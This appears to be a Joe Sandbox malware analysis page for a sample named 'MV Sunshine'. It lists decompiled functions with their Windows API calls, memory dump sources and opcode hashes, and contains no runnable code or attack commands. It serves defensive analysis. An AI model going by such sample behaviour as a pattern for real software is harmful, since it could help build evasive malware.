Function 00632123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 613fd9e68d54001a5cf8946be97620c6bdcbe3bd580a31d76b6f70b7bec6bb6f
Instruction ID: 9d25b3651c4779fc3a2d74d3c7a2ce074da970c21fcdb58ad8c211193b05d54a
Opcode Fuzzy Hash: 613fd9e68d54001a5cf8946be97620c6bdcbe3bd580a31d76b6f70b7bec6bb6f
Instruction Fuzzy Hash: 28518234600A15AFCF54EB64D992EAE77A7AF85310F14816CF906AB392CF30ED01CB59

Function 00625C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00625CF6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4712943b9f8d08d0f1d0b3e895ff27a969d2a52559c3b37364b5a7cb4155d9a7
Instruction ID: 0acf9d7c7b768876264420c2cd34de42401e269a8f17be094d9d7f5cf83846aa
Opcode Fuzzy Hash: 4712943b9f8d08d0f1d0b3e895ff27a969d2a52559c3b37364b5a7cb4155d9a7
Instruction Fuzzy Hash: A7315C71A00F29ABCB28DF29D48469DB7B6FF48310F148629D81A93710E731BD50DF95

Function 00640E48 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00640EF7

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c5de99f0ef067f12105bc2f9b9b121b0f05637f8ed4660246ba1f565ec3b2b1c
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: BE31D371A00115EBE718DF58D4809A9F7A7FF99300B648AA5EA0ACB751D731EDD1CB80

Function 006600D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006600E1

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d14e40dc38e9f021fb7c257ec63a16cc747a1f24a6a1d14359a9fed6a244c79a
Instruction ID: 66f41c52c23191bd635fcdf1239f31de582caee9cf3efdf49cc0a0daf24dc1c0
Opcode Fuzzy Hash: d14e40dc38e9f021fb7c257ec63a16cc747a1f24a6a1d14359a9fed6a244c79a
Instruction Fuzzy Hash: 01412474508751CFDB24DF54C484B5ABBE2BF45318F0988ACE8898B362C772E886CF52

Function 00625B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00625B61

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0cc2606fc3b1fd40bfaa31533107097cf4c29423adbae87a74b3d6375242f1bd
Instruction ID: 6e508d9c36b912bbe571041e02d52a7517cbc5191fc59a4412be1199eef833a3
Opcode Fuzzy Hash: 0cc2606fc3b1fd40bfaa31533107097cf4c29423adbae87a74b3d6375242f1bd
Instruction Fuzzy Hash: 08210271A00E18EBDF245F11E88166A7FBBFF00382F21846EE886C5050EB7286E4CB55

Function 00624F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00624D13: FreeLibrary.KERNEL32(00000000,?), ref: 00624D4D

Part of subcall function 0064548B: __wfsopen.LIBCMT ref: 00645496

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006E62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624F6F

Part of subcall function 00624CC8: FreeLibrary.KERNEL32(00000000), ref: 00624D02

Part of subcall function 00624DD0: _memmove.LIBCMT ref: 00624E1A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: d6bae24cf44a4519f17293f17586dcc36533b6f3fb913c42afea8aa56c4aca5a
Instruction ID: 78780230c171e067005537197f19b5cdee6f181c6758b176bbe9b519976b749d
Opcode Fuzzy Hash: d6bae24cf44a4519f17293f17586dcc36533b6f3fb913c42afea8aa56c4aca5a
Instruction Fuzzy Hash: CA11EB31600B25ABCB60BF74EC02BAD77A79F80701F10842DF541961C1DE715A059F65

Function 006601AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 006601BB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d1ed282e252b76aff5715d43193de0522fa0fa8ea9a6efcf59122d05cd59ead3
Instruction ID: 00a90603bb18d4981b2b4efdd18fae8e11c32eba83334bf7e2bb87254a0665f7
Opcode Fuzzy Hash: d1ed282e252b76aff5715d43193de0522fa0fa8ea9a6efcf59122d05cd59ead3
Instruction Fuzzy Hash: 1E215374508751CFCB24DF50D444A5ABBE2BF89304F05896CE88A4B321C731E886CFA3

Function 006278AD Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006278E9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
Instruction ID: 65e10c496ff3ee3b60877619ef485e963f96127da5c08c6a5526480932458eb8
Opcode Fuzzy Hash: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
Instruction Fuzzy Hash: 4911E532609A266BC754AB2CEC81E6AB39FEF45360714412EFD15C72D0DF31AC508B94

Function 00625D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00625807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00625D76

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0b96ee6b16b3ddc425c530ce32f49ab8cafc2d0a9462572b90190c2cdd07081a
Instruction ID: 031fa5152379e7b548f30a11f20502295f4b715a89f05b71d3ea9fe3e5ceeb6b
Opcode Fuzzy Hash: 0b96ee6b16b3ddc425c530ce32f49ab8cafc2d0a9462572b90190c2cdd07081a
Instruction Fuzzy Hash: EB112835200F119FD3308F15E484BA2B7E6EF45750F10C92EE4AB86A50D770E945CF64

Function 00625BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0065E141

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 791fbba160662e4781e3d189527a4a201ba056cfcc72e3e2610b02e4c56f5a3a
Instruction ID: 2e3139e98b657f1229307127c82afbcbb97e02d66a6dc1578402bdf226152fea
Opcode Fuzzy Hash: 791fbba160662e4781e3d189527a4a201ba056cfcc72e3e2610b02e4c56f5a3a
Instruction Fuzzy Hash: 6E01A2B9600942AFC355DB69D852D26FBAAFF8A350714815DF819C7702DB31EC21CBE4

Function 00644A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00644AD6

Part of subcall function 00648D68: __getptd_noexit.LIBCMT ref: 00648D68

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 927c9d17f70f3bb57bad6ca12b09cb0d10e26f140fd4bdfe49acf69c819f3830
Instruction ID: 7efd6b01dd4c5cf196547782fc979a08d9eb78cdf1fef68684a1b73afb352f1a
Opcode Fuzzy Hash: 927c9d17f70f3bb57bad6ca12b09cb0d10e26f140fd4bdfe49acf69c819f3830
Instruction Fuzzy Hash: 7DF0AF31940209AFDFA1AF64CC073DE36A3AF00325F058519B824AB2D5CF788A91EF59

Function 00624FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,006E62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624FDE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 68f0e42ab24fcb6b5bf4a8309113a0cb0f4a36799444ef4f18f7793598555811
Instruction ID: 8168628c3678dcb48458535c1f12c2369d5b2879ef674b46224e2828d833dbdf
Opcode Fuzzy Hash: 68f0e42ab24fcb6b5bf4a8309113a0cb0f4a36799444ef4f18f7793598555811
Instruction Fuzzy Hash: 07F03971105B22CFCB349F64E594862BBE2BF843293208A3EE1D782A10CB31A844DF40

Function 006409D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006409F4

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 6d127d237a6e34ced6c5044d25e236965cf00fd665eee2d5490e229b6635f73e
Instruction ID: b966aaf48a041ab929c2f961123adefc588f5d931bb0c5af4c093155048d6e31
Opcode Fuzzy Hash: 6d127d237a6e34ced6c5044d25e236965cf00fd665eee2d5490e229b6635f73e
Instruction Fuzzy Hash: E7E0CD3690522857C720E6989C05FFA77EEDFC9791F0401B5FC4CD7205D9A0AD818A95

Function 00689129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0068914B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 1db15d27ee06616c43d422e056546c702c6ea7e03d54480db0ad2c1fec8e6e91
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 9BE092B0118B005FD7349A24D8147E377E1AB06315F04091CF2EB83342EF6378418759

Function 00625DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0065E16B,?,?,00000000), ref: 00625DBF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e54caa023cbc0ffc7a32755d805f31654149e62f8247eb1a57cfe72f523b59ca
Instruction ID: 5aef83233dd8aa2055912dca56f174b9b680b2e171186e3d125df31d9dc81539
Opcode Fuzzy Hash: e54caa023cbc0ffc7a32755d805f31654149e62f8247eb1a57cfe72f523b59ca
Instruction Fuzzy Hash: 3ED0C77464020CBFE710DB80DC46FA977BDD705710F100194FD0456290D6B27D508B95

Function 0064548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00645496

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 126fe1666cbe3c7d14d820acbc5053d3efe81823d136888e512cb336dd9b7f96
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 56B0927684020C77DF412E82EC02A593B5A9B40778F808020FB0C1C162A673AAA09689

Function 0068D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0068D46A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 51d9c464a5c800a18d1e01ecfea588623f5b67f73144440cb41490260a67e4af
Instruction ID: 22f8193e99c128a3a953f1a6e3eccacbee50701aaee82ce5baed274b5d10950b
Opcode Fuzzy Hash: 51d9c464a5c800a18d1e01ecfea588623f5b67f73144440cb41490260a67e4af
Instruction Fuzzy Hash: 7E7153306047128FCB54EF24D491A6EB7E2AF88314F04466DF99697391DB30ED49CF66

Function 00F62D2C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F62D41

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 739f2423808a51b267eb72d642db3bd6f4e329bc69e20db772f537eb47d561d2
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 0AE0BF7494010DEFDB00EFA4D5496DE7BB4EF04301F1006A1FD05E7690DB709E549A62

Function 00F62D30 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F62D41

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: e728c4ca0f0c53219c23d402f5b9e4308d2a51448ddd12c5ed7a84c171451ac0
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 39E0E67494010DDFDB00EFB4D54969E7FB4EF04301F100261FD01E2280D6709D509A62

Non-executed Functions

Function 006ACDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006ACE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006ACE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 006ACED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006ACF00
SendMessageW.USER32 ref: 006ACF29
_wcsncpy.LIBCMT ref: 006ACFA1
GetKeyState.USER32(00000011), ref: 006ACFC2
GetKeyState.USER32(00000009), ref: 006ACFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006ACFE5
GetKeyState.USER32(00000010), ref: 006ACFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006AD018
SendMessageW.USER32 ref: 006AD03F
SendMessageW.USER32(?,00001030,?,006AB602), ref: 006AD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006AD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006AD16E
SetCapture.USER32(?), ref: 006AD177
ClientToScreen.USER32(?,?), ref: 006AD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006AD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006AD203
ReleaseCapture.USER32 ref: 006AD20E
GetCursorPos.USER32(?), ref: 006AD248
ScreenToClient.USER32(?,?), ref: 006AD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 006AD2B1
SendMessageW.USER32 ref: 006AD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 006AD31C
SendMessageW.USER32 ref: 006AD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006AD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 006AD37B
GetCursorPos.USER32(?), ref: 006AD39B
ScreenToClient.USER32(?,?), ref: 006AD3A8
GetParent.USER32(?), ref: 006AD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 006AD431
SendMessageW.USER32 ref: 006AD462
ClientToScreen.USER32(?,?), ref: 006AD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006AD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 006AD51A
SendMessageW.USER32 ref: 006AD53D
ClientToScreen.USER32(?,?), ref: 006AD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006AD5C3

Part of subcall function 006225DB: GetWindowLongW.USER32(?,000000EB), ref: 006225EC

GetWindowLongW.USER32(?,000000F0), ref: 006AD65F

Strings

F, xrefs: 006AD543
@GUI_DRAGID, xrefs: 006AD1AA
prn, xrefs: 006AD1BD

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
